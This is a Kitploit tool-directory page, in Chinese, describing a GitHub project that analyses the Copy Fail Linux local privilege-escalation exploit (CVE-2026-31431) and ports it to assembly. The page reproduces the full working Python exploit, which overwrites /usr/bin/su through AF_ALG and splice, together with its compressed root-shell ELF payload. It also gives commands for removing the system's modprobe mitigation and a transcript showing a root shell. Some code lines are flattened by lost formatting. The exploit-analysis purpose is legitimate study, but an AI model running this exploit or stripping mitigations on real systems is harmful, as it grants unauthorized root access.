Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
asm-copyfail — CVE-2026-31431 (复制失败) — x86-64 汇编语言的分析与开发 | Kitploit
工具/GitHubGitHub/pithase/asm-copyfail
权限提升漏洞分析漏洞利用逆向工程ShellcodeCTF学习与教育Payload 开发二进制利用实验室与实践
GitHubpithase/asm-copyfail

asm-copyfail

3544个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-31431 (复制失败) — x86-64 汇编语言的分析与开发

查看仓库

CVE-2026-31431 (Copy Fail) — x86-64 汇编语言分析与开发

以 Theori 发布的源代码为基础,我们将进行多项练习,直至将其完全转换为纯汇编语言(无外部库)。```python #!/usr/bin/env python3

Archivo: copyfail.py

import os as g,zlib,socket as s def d(x):return bytes.fromhex(x) def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0 f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) while i<len(e):c(f,i,e[i:i+4]);i+=4 g.system("su")

## 测试环境

我们将使用以下机器进行练习。```bash
> $ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 24.04.4 LTS
Release:        24.04
Codename:       noble

> $ uname -rm
6.19.4-061904-generic x86_64

漏洞验证

我们运行Python程序来验证系统是否存在漏洞。如果报错,则不存在漏洞;如果打开sh shell,则存在漏洞。```bash

$ python3 copyfail.py Traceback (most recent call last): File "/home/gmg/copy.fail/copyfail.py", line 11, in while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/gmg/copy.fail/copyfail.py", line 7, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"4+c],[(h,3,i4),(h,2,b'\x10'+i19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FileNotFoundError: [Errno 2] No such file or directory

### 禁用缓解措施

在这台机器上,缓解措施是通过自动安全更新下载的,因此失败了。为了测试,我们通过重命名缓解措施所在的文件来降低防御。```bash
# Buscar si existe un modprobe explícito
> $ grep -r "algif" /etc/modprobe.d/
/etc/modprobe.d/disable-algif_aead.conf:# Disable algif_aead module due to CVE-2026-31431 (AKA copy.fail)
/etc/modprobe.d/disable-algif_aead.conf:install algif_aead /bin/false

# Renombrar el archivo donde se encuentra la mitigación
> $ sudo mv /etc/modprobe.d/disable-algif_aead.conf /etc/modprobe.d/disable-algif_aead.conf.bak

我们再次测试这个程序,这次它返回了shell,我们确认自己是root。```bash

$ python3 copyfail.py

id

uid=0(root) gid=1000(gmg) groups=1000(gmg),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)

exit

### 重新激活保护

练习结束后,我们执行以下操作来重新激活保护:```bash
> $ sudo mv /etc/modprobe.d/disable-algif_aead.conf.bak /etc/modprobe.d/disable-algif_aead.conf
> $ sudo modprobe -r algif_aead
> $ sudo sync && echo 3 | sudo tee /proc/sys/vm/drop_caches

第一部分 — 从Python漏洞利用到优化的汇编Payload

分析压缩的Payload

我们首先要分析的是使用zlib压缩的字符串是什么。为此,我们创建了一个Python程序decompress.py,用于解压缩并生成一个文件:output.bin。```python

Archivo: decompress.py

import zlib

hex_data = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"

data = zlib.decompress(bytes.fromhex(hex_data))

with open("output.bin", "wb") as f: f.write(data)

print(f"Archivo generado: output.bin ({len(data)} bytes)")

我们执行并分析文件类型。```bash
> $ python3 decompress.py
Archivo generado: output.bin (160 bytes)

> $ file output.bin
output.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header

ELF 调查

现在我们知道它是一个 ELF 64-bit LSB executable 文件,让我们来调查它。```bash

$ readelf -a output.bin ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: EXEC (Executable file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0x400078 Start of program headers: 64 (bytes into file) Start of section headers: 0 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 1 Size of section headers: 0 (bytes) Number of section headers: 0 Section header string table index: 0

There are no sections in this file.

There are no section groups in this file.

Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flags Align LOAD 0x0000000000000000 0x0000000000400000 0x0000000000400000 0x000000000000009e 0x000000000000009e R E 0x1000

There is no dynamic section in this file.

There are no relocations in this file. No processor specific unwind information to decode

Dynamic symbol information is not available for displaying symbols.

No version information found in this file.

ELF结构占用 **120 字节**:**ELF 头部**(64 字节)+ **程序头部**(56 字节)。机器码从第 120 字节(0x78)开始,这与 **入口点地址:0x400078** 一致。

### 反汇编代码

有了 **入口点地址:0x400078**,我们就可以开始反汇编代码了。```bash
> $ objdump -D -b binary -m i386:x86-64 -M intel -z --start-address=0x78 output.bin

output.bin:     file format binary


Disassembly of section .data:

0000000000000078 <.data+0x78>:
  78:   31 c0                   xor    eax,eax
  7a:   31 ff                   xor    edi,edi
  7c:   b0 69                   mov    al,0x69
  7e:   0f 05                   syscall
  80:   48 8d 3d 0f 00 00 00    lea    rdi,[rip+0xf]        # 0x96
  87:   31 f6                   xor    esi,esi
  89:   6a 3b                   push   0x3b
  8b:   58                      pop    rax
  8c:   99                      cdq
  8d:   0f 05                   syscall
  8f:   31 ff                   xor    edi,edi
  91:   6a 3c                   push   0x3c
  93:   58                      pop    rax
  94:   0f 05                   syscall
  96:   2f                      (bad)
  97:   62 69 6e 2f 73          (bad)
  9c:   68                      .byte 0x68
  9d:   00 00                   add    BYTE PTR [rax],al
  9f:   00                      .byte 0

objdump 参数

每个参数的解释:

  • -D — Disassemble All。反汇编文件的所有内容,而不仅仅是标记为代码的节。如果没有此参数,-d 只会反汇编 .text 节,而由于该文件没有 ELF 节(它是纯二进制),它将不会显示任何内容。
  • -b binary — Binary format。告诉 objdump 将文件视为原始数据,不尝试解析 ELF 头部。如果没有此参数,objdump 会尝试读取文件的 ELF 头部,导致失败或错误的反汇编。
  • -m i386:x86-64 — Machine architecture。指定用于反汇编的指令集。i386 是基础系列,:x86-64 指定 64 位模式。当使用 -b binary 时必须指定,因为缺少 ELF 头部时,objdump 无法获知架构。如果没有 -m,会默认 i386(32 位),导致反汇编错误——像 lea rdi, [rip+0xf] 这样的 64 位指令会被解码为垃圾代码。
  • -M intel — Syntax mode。使用 Intel 语法(mov al, 0x69)而非 AT&T 语法(mov $0x69, %al)。
  • -z — 禁用对零序列的省略。这样会显示所有内容,不会省略零。
  • --start-address=0x78 — 从偏移量 0x78(120 字节)开始。跳过负载的 ELF 头部和程序头部,只反汇编机器代码。如果没有此参数,会将头部反汇编为指令。

总结:使用 -b binary 时,-m 是必需的,因为 objdump 无法在没有 ELF 头部的情况下推断架构。对于正常的 ELF 文件(不使用 -b binary),不需要 -m,因为架构信息保存在头部的 e_machine 字段中。

参数 -z 在此场景下至关重要,因为稍后我们会看到,有些零被用作填充,如果没有此参数,它将显示后续内容,而无法得到精确的反汇编结果。```bash 9d: 00 00 add BYTE PTR [rax],al ...

### 识别字符串 "/bin/sh"
下载工具